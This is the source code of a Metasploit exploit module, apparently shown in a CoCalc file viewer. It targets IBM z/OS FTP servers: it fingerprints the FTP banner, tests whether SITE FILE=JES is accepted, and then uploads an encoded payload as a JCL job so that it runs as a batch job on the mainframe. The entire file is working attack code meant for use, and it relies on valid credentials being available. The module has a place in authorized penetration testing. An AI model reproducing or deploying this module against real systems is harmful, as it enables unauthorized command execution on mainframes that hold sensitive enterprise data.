CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = NormalRanking
9

10
  include Msf::Exploit::Remote::Ftp
11
  include Msf::Exploit::Remote::Tcp
12

13
  def initialize(info = {})
14
    super(update_info(
15
      info,
16
      'Name'           => 'FTP JCL Execution',
17
      'Description'    => %q{(Submit JCL to z/OS via FTP and SITE FILE=JES.
18
        This exploit requires valid credentials on the target system)},
19
      'Author'         =>
20
         [
21
           'Bigendian Smalls',
22
           'mainframed a.k.a. soldier of fortran',
23
           'S&Oxballs a.k.a. chiefascot'
24
         ],
25
      'Arch'           => ARCH_CMD,
26
      'License'        => MSF_LICENSE,
27
      'Platform'       => ['mainframe'],
28
      'Privileged'     => false,
29
      'Targets'        => [['Automatic', {}]],
30
      'DisclosureDate' => '2013-05-12',
31
      'DisableNops'    => 'true',
32
      'DefaultTarget'  => 0
33
    ))
34

35
    register_options(
36
      [
37
        Opt::RPORT(21),
38
        OptInt.new('SLEEP', [ false, "Time to wait before checking if job has completed.", 5 ])
39
      ], self.class
40
    )
41
  end
42

43
  def post_auth?
44
    true
45
  end
46

47
  def check
48
    ##
49
    # Connect to get the FTP banner and check target OS
50
    ##
51
    if !connect_login
52
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server")
53
    else
54
      print_good("Successfully connected to FTP server.")
55
    end
56
    test_jes = send_cmd(['site', 'file=jes'])
57

58
    # Disconnect and check cached self.banner
59
    disconnect
60

61
    ##
62
    # Check if the target system has an FTP server running on z/OS"
63
    ##
64
    case banner
65
    when /IBM FTP CS V.R./
66
      case test_jes
67
      when /200 SITE/
68
        print_status("Found IBM z/OS Banner and JES commands accepted")
69
        return Exploit::CheckCode::Vulnerable
70
      else
71
        print_error("Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!")
72
        return Exploit::CheckCode::Detected
73
      end
74

75
    ##
76
    # Return the Safe flag if system is not exploitable
77
    ##
78
    else
79
      print_status("We could not recognize the server banner: #{banner.strip}")
80
      return Exploit::CheckCode::Safe
81
    end
82
  end
83

84
  ##
85
  # Exploit the target system by submitting a JCL job via FTP
86
  ##
87
  def exploit
88
    if !connect_login
89
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server")
90
    else
91
      print_good("Successfully connected to FTP server.")
92
    end
93

94
    send_cmd(['site', 'file=jes'])
95
    print_good("Successfully switched to JES mode")
96

97
    jcl_file_name = "#{Rex::Text.rand_text_alpha(8).upcase}"
98
    print_status("Uploading JCL file: #{jcl_file_name}")
99

100
    res = send_cmd_data(['put', jcl_file_name], payload.encoded)
101
    if res.nil?
102
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")
103
    end
104

105
    job_num = res.lines.first.split.last
106
    print_good("Job Submitted. Job number is #{job_num}")
107

108
    handler
109
    disconnect
110
  end
111
end
112

113